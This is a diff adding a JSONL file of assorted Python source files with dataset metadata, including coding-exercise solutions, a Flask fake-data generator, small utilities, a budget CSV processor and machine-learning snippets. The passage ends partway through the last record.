diff --git "a/6610.jsonl" "b/6610.jsonl"
new file mode 100644
--- /dev/null
+++ "b/6610.jsonl"
@@ -0,0 +1,609 @@
+{"seq_id":"128435842","text":"from tkinter import *\r\n\r\nwindowWidth = 800\r\nwindowHeight = 800\r\nroot = Tk()\r\n\r\ncanvas = Canvas(root, width=windowWidth, height=windowHeight, borderwidth=0, highlightthickness=0, bg=\"#000050\")\r\ncanvas.grid()\r\n \r\n# this code runs whenever the mouse is clicked on the window\r\ndef mouse_pressed(event):\r\n    # draws a dark blue background\r\n    canvas.create_rectangle(0, 0, windowWidth, windowHeight, fill=\"#000050\")\r\n    # x and y will be equal to the mouse pointer's x and y location\r\n    x = event.x\r\n    y = event.y\r\n    \r\n    # this defines the x and y coordinates of the points\r\n    # of each rocket shape\r\n    shipPoints = [x+100, y, x-100, y, x-100, y+250, x+100, y+250]\r\n    outerFirePoints = [x+100, y+250, x+150, y+300, x-150, y+300, x-100, y+250]\r\n    firePoints = [x+175, y+300, x+200, y+350, x-200, y+350, x-175, y+300]\r\n    shipTop = [x+100, y, x-100, y, x, y-150]\r\n    canvas.create_polygon(shipPoints, fill='gray', width=2) # draws the rocket body\r\n    \r\n    #1. Add details to your rocket to make it look better. You can look at rocket.png for inspiration.\r\n    canvas.create_polygon(outerFirePoints, fill='orange', width=1)\r\n    canvas.create_polygon(firePoints, fill='red', width=1)\r\n    canvas.create_polygon(shipTop, fill = 'black', width=1)\r\n    #2. Modify the locations of the shapes above so the rocket will be drawn where the mouse is clicked\r\n    \r\n\r\ncanvas.bind(\"<Button-1>\", mouse_pressed)\r\n\r\nroot.mainloop()","sub_path":"_04_int/_4_rocket_ship/rocket_ship.py","file_name":"rocket_ship.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"304916808","text":"# coding=utf-8\n\"\"\"Unique Substrings in Wraparound String.\n\n>>> solve = _solve\n>>> solve('cac')\n2\n>>> solve('zab')\n6\n>>> solve('abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz')\n1027\n\"\"\"\n\n\n# consider substrings that start with each letter a-z\ndef _solve(p):\n    if not p:\n        return 0\n    dp = {chr(97 + i): 0 for i in xrange(26)}\n    nxt = {chr(97 + i): chr(97 + i + 1) for i in xrange(25)}\n    nxt['z'] = 'a'\n    p += '#'\n    start, count, length = 0, 1, len(p)\n    for i in xrange(1, length):\n        if nxt[p[i - 1]] == p[i]:\n            count += 1\n        else:\n            for ch in p[start:i]:\n                if count > dp[ch]:\n                    dp[ch] = count\n                else:\n                    break\n                count -= 1\n            start = i\n            count = 1\n    return sum(dp.values())\n\n\n# considering substrings that end with a given letter makes the code much cleaner\ndef _solve1(p):\n    if not p:\n        return 0\n    dp = {chr(97 + i): 0 for i in xrange(26)}\n    nxt = {chr(97 + i): chr(97 + i + 1) for i in xrange(25)}\n    nxt['z'] = 'a'\n    count, length = 1, len(p)\n    dp[p[0]] = 1\n    for i in xrange(1, length):\n        if nxt[p[i - 1]] == p[i]:\n            count += 1\n        else:\n            count = 1\n        if count > dp[p[i]]:\n            dp[p[i]] = count\n    return sum(dp.values())\n","sub_path":"medium/467.py","file_name":"467.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"116813728","text":"#!/usr/bin/python3\r\n\"\"\"\r\n@Author : Zhaohui Mei(梅朝辉)\r\n@Email : mzh.whut@gmail.com\r\n\r\n@Time : 2018/11/19 21:32\r\n@File : fakes.py\r\n@Version : 1.0\r\n@Interpreter: Python3.6.2\r\n@Software: PyCharm\r\n\r\n@Description: helpers that generate fake data\r\n\"\"\"\r\nimport random\r\nfrom faker import Faker\r\n\r\nfrom bluelog.models import Admin, Category, Post, Comment\r\nfrom bluelog.extensions import db\r\nfrom sqlalchemy.exc import IntegrityError\r\n\r\nfake = Faker()\r\n\r\n\r\ndef fake_admin():\r\n    \"\"\"Generate a fake admin account.\"\"\"\r\n    admin = Admin(\r\n        username='admin',\r\n        blog_title='Bluglog',\r\n        blog_sub_title=\"No,I'm the real thing.\",\r\n        name='meizhaohui',\r\n        about='Enjoy your life'\r\n    )\r\n    # Note: when the Admin class in models.py inherits UserMixin, the IDE flags this line\r\n    # when generating fake data, UserMixin can be removed from the Admin class\r\n    admin.password = 'Helloflask'\r\n    db.session.add(admin)\r\n    db.session.commit()\r\n\r\n\r\ndef fake_categories(count=10):\r\n    \"\"\"Generate fake categories.\"\"\"\r\n    category = Category(name='default')\r\n    db.session.add(category)\r\n    try:\r\n        db.session.commit()\r\n    except IntegrityError:\r\n        db.session.rollback()\r\n\r\n    for i in range(count):\r\n        category = Category(name=fake.word())\r\n        db.session.add(category)\r\n        try:\r\n            db.session.commit()\r\n        except IntegrityError:\r\n            db.session.rollback()\r\n\r\n\r\ndef fake_posts(count=50):\r\n    \"\"\"Generate fake posts.\"\"\"\r\n    for i in range(count):\r\n        post = Post(\r\n            title=fake.sentence(),\r\n            body=fake.text(500),\r\n            timestamp=fake.date_time_this_year()\r\n        )\r\n        post.category = Category.query.get(\r\n            random.randint(1, Category.query.count()))\r\n        db.session.add(post)\r\n    db.session.commit()\r\n\r\n\r\ndef fake_comments(count=500):\r\n    \"\"\"Generate fake comments.\"\"\"\r\n    for i in range(count):\r\n        comment = Comment(\r\n            author=fake.name(),\r\n            email=fake.ascii_email(),\r\n            site=fake.url(),\r\n            body=fake.sentence(),\r\n            timestamp=fake.date_time_this_year(),\r\n            reviewed=True,\r\n            post=Post.query.get(random.randint(1, Post.query.count()))\r\n        )\r\n        db.session.add(comment)\r\n\r\n    salt = int(count * 0.1)\r\n    for i in range(salt):\r\n        # unreviewed comments\r\n        comment = Comment(\r\n            author=fake.name(),\r\n            email=fake.ascii_email(),\r\n            site=fake.url(),\r\n            body=fake.sentence(),\r\n            timestamp=fake.date_time_this_year(),\r\n            reviewed=False,\r\n            post=Post.query.get(random.randint(1, Post.query.count()))\r\n        )\r\n        db.session.add(comment)\r\n\r\n        # comments posted by the admin\r\n        comment = Comment(\r\n            author='meizhaohui',\r\n            email=fake.ascii_email(),\r\n            site=fake.url(),\r\n            body=fake.sentence(),\r\n            timestamp=fake.date_time_this_year(),\r\n            from_admin=True,\r\n            reviewed=True,\r\n            post=Post.query.get(random.randint(1, Post.query.count()))\r\n        )\r\n        db.session.add(comment)\r\n    db.session.commit()\r\n\r\n    # replies\r\n    for i in range(salt):\r\n        comment = Comment(\r\n            author=fake.name(),\r\n            email=fake.ascii_email(),\r\n            site=fake.url(),\r\n            body=fake.sentence(),\r\n            timestamp=fake.date_time_this_year(),\r\n            reviewed=True,\r\n            post=Post.query.get(random.randint(1, Post.query.count())),\r\n            replied=Comment.query.get(random.randint(1, Comment.query.count()))\r\n        )\r\n        db.session.add(comment)\r\n    db.session.commit()\r\n\r\n","sub_path":"bluelog/fakes.py","file_name":"fakes.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"224021103","text":"###############################################################################\n# Copyright 2012 to the present, Orbitz Worldwide, LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\n\nimport context\n\n__doc__ = \"\"\"\nThis package makes it a little bit easier to write higher level objects.\n\nWarning: you will still need the lower level API to figure out complex\nrelationships. This package just makes simple things easier.\n\"\"\"\n\nclass HOSTDBNode(context.EntityContext):\n    \"\"\"Special Class to encapsulate lower level ROMEO API\"\"\"\n    entityAttr = None\n    specialKeys = []\n    entity = None\n\n    def __init__(self, RomeoKeyValueInstance):\n        \"\"\"override the default constructor\"\"\"\n        setattr(self, self.entityAttr, RomeoKeyValueInstance)\n        self.data = {}\n\n    def __getattribute__(self, name):\n        if name.startswith('get_'):\n            return lambda: _gettr_(self, name.replace('get_',''))\n        try: return context.EntityContext.__getattribute__(self, name)\n        except AttributeError:\n            if name in self.specialKeys: return self.get(name)\n            raise #re-raise original exception\n\n    def __repr__(self):\n        if self.__class__.__name__ == 'ENVIRONMENT':\n            return self.entity.get('NAME').VALUE\n        return \"HOSTDBNODE(%s)\" % (self.__class__.__name__,)\n\n\ndef _gettr_(obj, key_name):\n    entity = getattr(obj, obj.entityAttr)\n    x = entity.get(key_name)\n    if hasattr(x, '__iter__'):\n        return _iter_(entity, x)\n    if isinstance(x, entity.__class__):\n        if x.COMPLEX_CONSTRUCTOR:\n            return node_constructor(x)\n        return x.VALUE\n    return x\n\ndef _iter_(entity, objects):\n    for x in objects:\n        if isinstance(x, entity.__class__):\n            if x.COMPLEX_CONSTRUCTOR:\n                yield node_constructor(x)\n            else: yield x.VALUE\n        else: yield x\n\ndef node_constructor(RomeoKeyValueInstance):\n    from romeo.foundation import RomeoKeyValue\n    if not isinstance(RomeoKeyValueInstance, RomeoKeyValue):\n        raise TypeError('Cannot adapt <%s> to <RomeoKeyValue>' % \\\n                str(RomeoKeyValueInstance))\n\n    keys = [ i for i in RomeoKeyValueInstance.keys() if i != \\\n            RomeoKeyValueInstance.KEY ]\n    members = { \n        'entityAttr': str(RomeoKeyValueInstance.KEY),\n        'specialKeys': list(keys),\n        'entity': RomeoKeyValueInstance,\n    }\n\n    # create a new class node\n    instance = type(\n        str(RomeoKeyValueInstance.KEY),\n        (HOSTDBNode,),\n        members\n    )\n    # initialize the instance now\n    return instance(RomeoKeyValueInstance)\n\ndef getEnvironment(name):\n    import romeo\n    return node_constructor(romeo.getEnvironment(name))\n\ndef listEnvironments():\n    import romeo\n    return [node_constructor(i) for i in romeo.listEnvironments()]\n\ndef whoami(hostname):\n    import romeo\n    return node_constructor(romeo.whoami(hostname))\n\ndef me():\n    import romeo\n    return node_constructor(romeo.whoami())\n\ndef safe_iter(obj):\n    if hasattr(obj, '__iter__'):\n        return obj\n    return (i for i in [obj]) \n","sub_path":"romeo/lib/romeo/hostdb.py","file_name":"hostdb.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"493127489","text":"# Solution 1: collect every node with an iterative in-order traversal, then walk the list to set each node's left and right\r\nclass Node:\r\n    def __init__(self, val, left=None, right=None):\r\n        self.val = val\r\n        self.left = left\r\n        self.right = right\r\nclass Solution:\r\n    def treeToDoublyList(self, root: 'Node') -> 'Node':\r\n        def mid_search(root): # standard iterative in-order traversal\r\n            stack = []\r\n            res = []\r\n            cur = root\r\n            while cur or stack:\r\n                if cur:\r\n                    stack.append(cur)\r\n                    cur = cur.left\r\n                else:\r\n                    top = stack.pop()\r\n                    res.append(top)\r\n                    cur = top.right\r\n            return res\r\n\r\n        res=mid_search(root)\r\n        pre=res[-1]\r\n        for i in res:\r\n            i.left=pre\r\n            pre.right=i\r\n            pre=i\r\n        return res[0]\r\n\r\n# Solution 2: set each node's left and right during the iterative in-order traversal, then wire up the head's left and the tail's right\r\nclass Solution:\r\n    def treeToDoublyList(self, root: 'Node') -> 'Node':\r\n        self.stack = []\r\n        self.head = None\r\n        self.pre = None\r\n        if not root:\r\n            return\r\n\r\n        def mid_search(root): # standard iterative in-order traversal\r\n            cur = root\r\n            while cur or self.stack:\r\n                if cur:\r\n                    self.stack.append(cur)\r\n                    cur = cur.left\r\n                else:\r\n                    top = self.stack.pop()\r\n                    if not self.head:\r\n                        self.head = top\r\n                        self.pre = top\r\n\r\n                    else:\r\n                        top.left = self.pre\r\n                        self.pre.right = top\r\n                        self.pre = top\r\n                    cur = top.right\r\n\r\n        mid_search(root)\r\n        self.head.left = self.pre\r\n        self.pre.right = self.head\r\n        return self.head\r\n\r\n# Solution 3: recursive in-order traversal; otherwise the same idea as Solution 2\r\nclass Node:\r\n    def __init__(self, val, left=None, right=None):\r\n        self.val = val\r\n        self.left = left\r\n        self.right = right\r\nclass Solution:\r\n    def treeToDoublyList(self, root: 'Node') -> 'Node':\r\n        if not root: # if the tree is empty, return immediately\r\n            return None\r\n\r\n        self.head=None # head node of the linked list\r\n        self.pre=None # previous node\r\n\r\n        def midorder(cur):\r\n            if not cur:\r\n                return\r\n            midorder(cur.left) # go all the way left first\r\n            if not self.head: # if there is no head yet (initial state)\r\n                self.head=cur\r\n                self.pre=cur\r\n            else:\r\n                cur.left=self.pre # the current node's left is the previous in-order node\r\n                self.pre.right=cur # the previous node's right is the current node\r\n                self.pre=cur # the previous node becomes the current one\r\n            midorder(cur.right)\r\n\r\n        midorder(root)\r\n        # link the head and tail nodes\r\n        self.head.left=self.pre\r\n        self.pre.right=self.head\r\n        return self.head\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"剑指offor/36.py","file_name":"36.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"371665056","text":"class Solution:\n    \n    \"\"\"\n    \n    Name : Shahreen Shahjahan Psyche\n    Time : O(MNlog(MN-K)) [Where M and N is the dimension of the matrix]\n    Space: O(MN - K) [The Heap Size]\n    \n    \"\"\"\n    \n    def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n        \n        # edge case\n        if not matrix:\n            return float('inf')\n        \n        import heapq\n        \n        track = []\n        N = len(matrix) * len(matrix[0])\n        max_val = float('-inf')\n        \n        for i in range(len(matrix)):\n            for j in range(len(matrix[0])):\n                heapq.heappush(track, matrix[i][j])\n                if len(track) > N - k:\n                    val = heapq.heappop(track)\n                    max_val = max(val, max_val)\n        return max_val\n","sub_path":"Kth Smallest Element in a Sorted Matrix.py","file_name":"Kth Smallest Element in a Sorted Matrix.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"556317001","text":"import os\nimport time\n\n\ndef log(type, msg):\n    logfile = 'bot.log'\n    t = str(time.asctime())\n    colors = {\n        'info': '\\033[94m'+ t +' | INFO | ',\n        'log': '\\033[95m'+ t +' | LOG | ',\n        'success': '\\033[92m'+ t +' | SUCCESS | ',\n        'warning': '\\033[93m'+ t +' | WARNING | ',\n        'error': '\\033[91m'+ t +' | ERROR | ',\n        'bold': '\\033[1m',\n        'underline': '\\033[4m',\n        'end': '\\033[0m',\n    }\n    logmessage = colors[type] + msg + colors['end']\n    print(logmessage)\n    if os.path.isfile(logfile) and os.access(logfile, os.W_OK):\n        with open(logfile, \"a\") as file:\n            file.write(logmessage+'\\n')\n    elif os.access('./', os.W_OK):\n        with open(logfile, \"w+\") as file:\n            file.write(logmessage+'\\n')\n    else:\n        print(colors['info']+'Can not Write Log File!'+colors['end'])\n","sub_path":"bot/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"290072974","text":"import os\nimport time\nimport pymysql\nimport logging\nimport sys\n\npwd = os.environ['MYSQL_PWD']\nunix_socket= os.environ['UNIX_SOCKET']\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\ndef insert_log(type, user_id, platform, message, intent, not_handled, confidence):\n #logging.debug(user_id + \" insert_log call: \" + str(int(time.time())))\n conn = pymysql.connect(\n unix_socket=unix_socket,\n user='root',\n password=pwd,\n database='kolon',\n charset='utf8')\n curs = conn.cursor(pymysql.cursors.DictCursor)\n timestamp = int(time.time())\n sql = \"INSERT INTO log(type, user_id, time_stamp, platform, message, intent, not_handled, confidence) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n curs.execute(sql, (\n type, user_id, timestamp, platform, message, intent, not_handled,\n confidence))\n conn.commit()\n curs.close()\n conn.close()\n #logging.debug(user_id + \" insert_log fin: \" + str(int(time.time())))\n","sub_path":"kakao_kolon/db_client.py","file_name":"db_client.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53384149","text":"import unittest \nfrom base import Base, Character_Query\n\n\nclass TestApi(unittest.TestCase):\n\n def test_Base_request(self):\n \"\"\"Test for request\"\"\"\n response = Base().api_info()['characters']\n self.assertEqual(response,\"https://rickandmortyapi.com/api/character\")\n\n def test_character_name(self):\n \"\"\"Test for resquest character name\"\"\"\n response = Character_Query().get_by_id(1)[\"name\"]\n self.assertEqual(response,'Rick Sanchez')\n\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"test_case.py","file_name":"test_case.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"415744433","text":"# -*- coding: utf-8 -*-\n\n\nimport matplotlib.pyplot as plt\n\nx= [2,3,5,6,1,4,5,8,2,4,5,7,3]\ny= [2,3,5,6,1,4,5,8,2,4,5,7,3]\n\nplt.scatter(x, y, label=\"Test\", color = \"RED\" , s = 200)\nplt.xlabel('X-axis')\nplt.ylabel(\"Y-axis\")\nplt.title(\"First graph\")\nplt.legend()\nplt.show()","sub_path":"Scaterplot.py","file_name":"Scaterplot.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361111972","text":"import os\nimport json\nimport boto3\nimport datetime\nimport hashlib\nfrom risk_score import *\n\ndynamodb = boto3.resource('dynamodb')\n\ndef calculate_hash(event):\n m = hashlib.sha3_512()\n for key in event:\n m.update(bytes(str(event[key]),'utf-8'))\n return m.hexdigest()\n\ndef lambda_handler(event, context):\n table = dynamodb.Table(os.environ['DYNAMO_TBL'])\n \n score = calculate_score(event)\n \n event['timestamp'] = datetime.utcnow().isoformat()\n event['score'] = score\n event['risk_level'] = risk_level(score)\n \n data = {\n 'hash_id': calculate_hash(event),\n 'data': event\n }\n \n table.put_item(\n Item = data\n )\n \n response = {\n \"hash_id\": data['hash_id'],\n \"timestamp\": event['timestamp'],\n \"risk_score\": event['risk_score'],\n \"risk_level\": event['risk_level']\n }\n \n return {\n 'statusCode': 200,\n 'body': response\n }\n","sub_path":"covid19_selfAssessment/writeAssessment/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"501733288","text":"import time\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\n\nclass ESN(nn.Module):\n def __init__(self, input_size, output_size, r_size=200, spectral_radius=0.95, \n sparsity=0):\n super(ESN, self).__init__()\n\n self.input_size = input_size\n self.output_size = output_size\n self.r_size = r_size\n self.spectral_radius = spectral_radius\n self.sparsity = sparsity\n self.random_state = np.random.RandomState(int(time.time()))\n input_weights = self.random_state.rand(r_size, input_size) * 2 - 1\n input_weights[self.random_state.rand(*input_weights.shape) < self.sparsity] = 0\n\n self.W_in = nn.Parameter(torch.from_numpy(input_weights.astype(np.float32))) \n self.W = self.init_reservoir()\n\n self.tanh = nn.Tanh()\n\n def init_reservoir(self):\n reservoir = self.random_state.rand(self.r_size, self.r_size) - 0.5\n reservoir[self.random_state.rand(*reservoir.shape) < self.sparsity] = 0\n radius = np.max(np.abs(np.linalg.eigvals(reservoir)))\n tensor = torch.from_numpy((reservoir * (self.spectral_radius / radius)).astype(np.float32))\n return nn.Parameter(tensor)\n\n def init_hidden(self):\n reservoir = np.zeros((self.r_size, self.r_size))\n return Variable(torch.from_numpy(reservoir).float())\n\n\n def forward(self, input_tensor, prev_hidden):\n x_in = self.W_in.mv(input_tensor)\n x_W = self.W.mm(prev_hidden)\n update = self.tanh(x_in + x_W)\n \n return update\n","sub_path":"text_generation/models/ESN.py","file_name":"ESN.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"287603748","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n head=cur=ListNode(0)\n cf=0\n while l1 or l2 or cf:\n v1=v2=0\n if l1:\n v1=l1.val\n l1=l1.next\n if l2:\n v2=l2.val\n l2=l2.next\n cf,val= divmod(v1+v2+cf,10)\n cur.next=ListNode(val)\n cur=cur.next\n return head.next","sub_path":"2_AddTwoNumbers.py","file_name":"2_AddTwoNumbers.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"170947272","text":"#encoding: utf8\n\nimport csv\nimport json\nimport logging\nimport sys\n\nROOT_COL = None\ndef indexof(*args):\n row = args[0]\n names = args[1:]\n for name in names:\n for i,_h in enumerate(row):\n h = _h.decode('utf8')\n if all(word in h for word in name.split()):\n return i\n logging.error('cant find %s in row!' 
% \"/\".join(names))\n logging.error('row=%s' % \", \".join(row))\n return None\n\ndef to_code(row,col):\n t = row[col]\n if '-' in t:\n t = t.split('-')\n assert(len(t)==((col-ROOT_COL+2)/2))\n t= [ \"%02d\" % int(x) for x in t ]\n t = \"00\" + ''.join(t)\n else:\n add = \"0\" * (col-ROOT_COL+4-len(t))\n t=add+t\n return t\n\ndef get_from(row,index,to_add=0):\n try:\n if index is None:\n return None\n val = row[index]\n val = val.replace(\",\",\"\")\n if \".\" in val:\n return float(val)+to_add\n else:\n return int(val)+to_add\n except:\n return None\n\ndef add_to_sums(key,sums,amount,field):\n if amount is not None: sums[key][field] = sums[key].setdefault(field,0)+amount\n\ndef add_to_list(key,sums,item,field):\n if item is not None:\n if item not in sums[key][field]:\n sums[key][field].append(item)\n if len(sums[key][field])>1 and len(key)>=11 and field != 'kind':\n logging.error(\"TOO MANY GROUPS FOR %r\" % sums[key])\n\nclass new_budget_csv(object):\n\n def process(self,input,output,new_years=[]):\n sums = {}\n budgets=csv.reader(file(input))\n YEAR_COL = None\n for row in budgets:\n try:\n year = int(row[YEAR_COL])\n except:\n if YEAR_COL is not None:\n continue\n YEAR_COL = indexof(row,u'שנה')\n SAIF_COL = indexof(row,u'קוד סעיף')\n global ROOT_COL\n ROOT_COL = SAIF_COL\n SAIF_NAME_COL = indexof(row,u'שם סעיף')\n THUM_COL = indexof(row,u'קוד תחום')\n THUM_NAME_COL = indexof(row,u'שם תחום')\n PROG_COL = indexof(row,u'קוד תוכנית')\n PROG_NAME_COL = indexof(row,u'שם תוכנית')\n TAKA_COL = indexof(row,u'קוד תקנה')\n TAKA_NAME_COL = indexof(row,u'שם תקנה מלא',u'שם תקנה')\n\n NET_ALLOC_COL = indexof(row,u'מקורי נטו')\n GROSS_ALLOC_COL = indexof(row,u'מקורי הוצאה מותנית')\n\n DEDICATED_ALLOC_COL = indexof(row,u'מקורי הכנסה מיועדת')\n COMMITMENT_ALLOC_COL = indexof(row,u'מקורי הרשאה')\n PERSONNEL_ALLOC_COL = indexof(row,u'מקורי שיא כא')\n CONTRACTORS_ALLOC_COL = indexof(row,u'מקורי עבצ')\n AMOUNTS_ALLOC_COL = indexof(row,u'מקורי כמויות')\n\n NET_REVISED_COL = indexof(row,u'מאושר נטו')\n GROSS_REVISED_COL = indexof(row,u'תקציב מאושר הוצאה מותנית בהכנסה')\n\n DEDICATED_REVISED_COL = indexof(row,u'מאושר הכנסה מיועדת')\n COMMITMENT_REVISED_COL = indexof(row,u'מאושר הרשאה')\n PERSONNEL_REVISED_COL = indexof(row,u'מאושר שיא כא')\n CONTRACTORS_REVISED_COL = indexof(row,u'מאושר עבצ')\n AMOUNTS_REVISED_COL = indexof(row,u'מאושר כמויות')\n\n USED_COL = indexof(row,u'ביצוע מזומן')\n\n ACTIVE_COL = indexof(row,u'תקנה פעילה')\n\n INOUT_COL = indexof(row,u'סוג הוצאה')\n\n GROUP1_COL = indexof(row,u'שם רמה 1')\n GROUP2_COL = indexof(row,u'שם רמה 2')\n\n\n continue\n for col,title_col in [(SAIF_COL,SAIF_NAME_COL),(THUM_COL,THUM_NAME_COL),(PROG_COL,PROG_NAME_COL),(TAKA_COL,TAKA_NAME_COL)]:\n if col is None or title_col is None:\n continue\n code = to_code(row,col)\n # if len(code) != col+3:\n # logging.error(\"%s, %s\" % (code, row))\n # assert(False)\n new_year = year in new_years and len(code) < 10\n title = row[title_col].decode('utf8')\n net_allocated = get_from(row,NET_ALLOC_COL)\n gross_allocated = get_from(row,GROSS_ALLOC_COL,net_allocated)\n net_revised = get_from(row,NET_REVISED_COL) if not new_year else net_allocated\n gross_revised = get_from(row,GROSS_REVISED_COL,net_revised) if not new_year else gross_allocated\n net_used = get_from(row,USED_COL)\n\n dedicated_allocated = get_from(row,DEDICATED_ALLOC_COL)\n commitment_allocated = get_from(row,COMMITMENT_ALLOC_COL)\n personnel_allocated = get_from(row,PERSONNEL_ALLOC_COL)\n contractors_allocated = get_from(row,CONTRACTORS_ALLOC_COL)\n 
amounts_allocated = get_from(row,AMOUNTS_ALLOC_COL)\n\n dedicated_revised = get_from(row,DEDICATED_REVISED_COL)\n commitment_revised = get_from(row,COMMITMENT_REVISED_COL)\n personnel_revised = get_from(row,PERSONNEL_REVISED_COL)\n contractors_revised = get_from(row,CONTRACTORS_REVISED_COL)\n amounts_revised = get_from(row,AMOUNTS_REVISED_COL)\n\n if ACTIVE_COL is not None:\n active = row[ACTIVE_COL].decode('utf8') != u'פש\"ח'\n else:\n active = True\n\n tak_kind = 'unknown'\n if INOUT_COL is not None:\n if row[INOUT_COL].decode('utf8') == u'הכנסה':\n tak_kind = 'income'\n elif row[INOUT_COL].decode('utf8') == u'הוצאה':\n tak_kind = 'expense'\n\n all_values = [net_allocated,gross_allocated,gross_allocated,gross_revised,net_used,dedicated_allocated,commitment_allocated,personnel_allocated,contractors_allocated,amounts_allocated,dedicated_revised,commitment_revised,personnel_revised,contractors_revised,amounts_revised]\n all_zeros = sum(abs(x) for x in all_values if x is not None) == 0\n if all_zeros and not active and year not in new_years:\n continue\n\n group1 = group2 = None\n if GROUP1_COL is not None and GROUP2_COL is not None:\n group1 = row[GROUP1_COL].decode('utf8')\n group2 = row[GROUP2_COL].decode('utf8')\n group_top = group1\n group_full = group2\n\n key = \"%s/%s\" % (year,code)\n sums.setdefault(key,{'code':code,'year':year,'title':title,'group_top':[], 'group_full':[],'kind':[]})\n add_to_sums(key,sums,net_allocated,'net_allocated')\n add_to_sums(key,sums,net_revised,'net_revised')\n add_to_sums(key,sums,net_used,'net_used')\n add_to_sums(key,sums,gross_allocated,'gross_allocated')\n add_to_sums(key,sums,gross_revised,'gross_revised')\n\n add_to_sums(key,sums,dedicated_allocated,'dedicated_allocated')\n add_to_sums(key,sums,commitment_allocated,'commitment_allocated')\n add_to_sums(key,sums,personnel_allocated,'personnel_allocated')\n add_to_sums(key,sums,contractors_allocated,'contractors_allocated')\n add_to_sums(key,sums,amounts_allocated,'amounts_allocated')\n\n add_to_sums(key,sums,dedicated_revised,'dedicated_revised')\n add_to_sums(key,sums,commitment_revised,'commitment_revised')\n add_to_sums(key,sums,personnel_revised,'personnel_revised')\n add_to_sums(key,sums,contractors_revised,'contractors_revised')\n add_to_sums(key,sums,amounts_revised,'amounts_revised')\n\n add_to_list(key,sums,group_top,'group_top')\n add_to_list(key,sums,group_full,'group_full')\n add_to_list(key,sums,tak_kind,'kind')\n\n keys = sums.keys()\n keys.sort()\n\n out = file(output,\"w\")\n for key in keys:\n out.write(\"%s\\n\" % json.dumps(sums[key]))\n\nif __name__ == \"__main__\":\n input = sys.argv[1]\n output = sys.argv[-1]\n processor = new_budget_csv().process(input,output,[2014,2015])\n","sub_path":"processors/new_budget_csv.py","file_name":"new_budget_csv.py","file_ext":"py","file_size_in_byte":8517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"58433833","text":"from numpy import random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import model_selection\nfrom sklearn.ensemble import RandomForestClassifier, VotingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import make_scorer\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import 
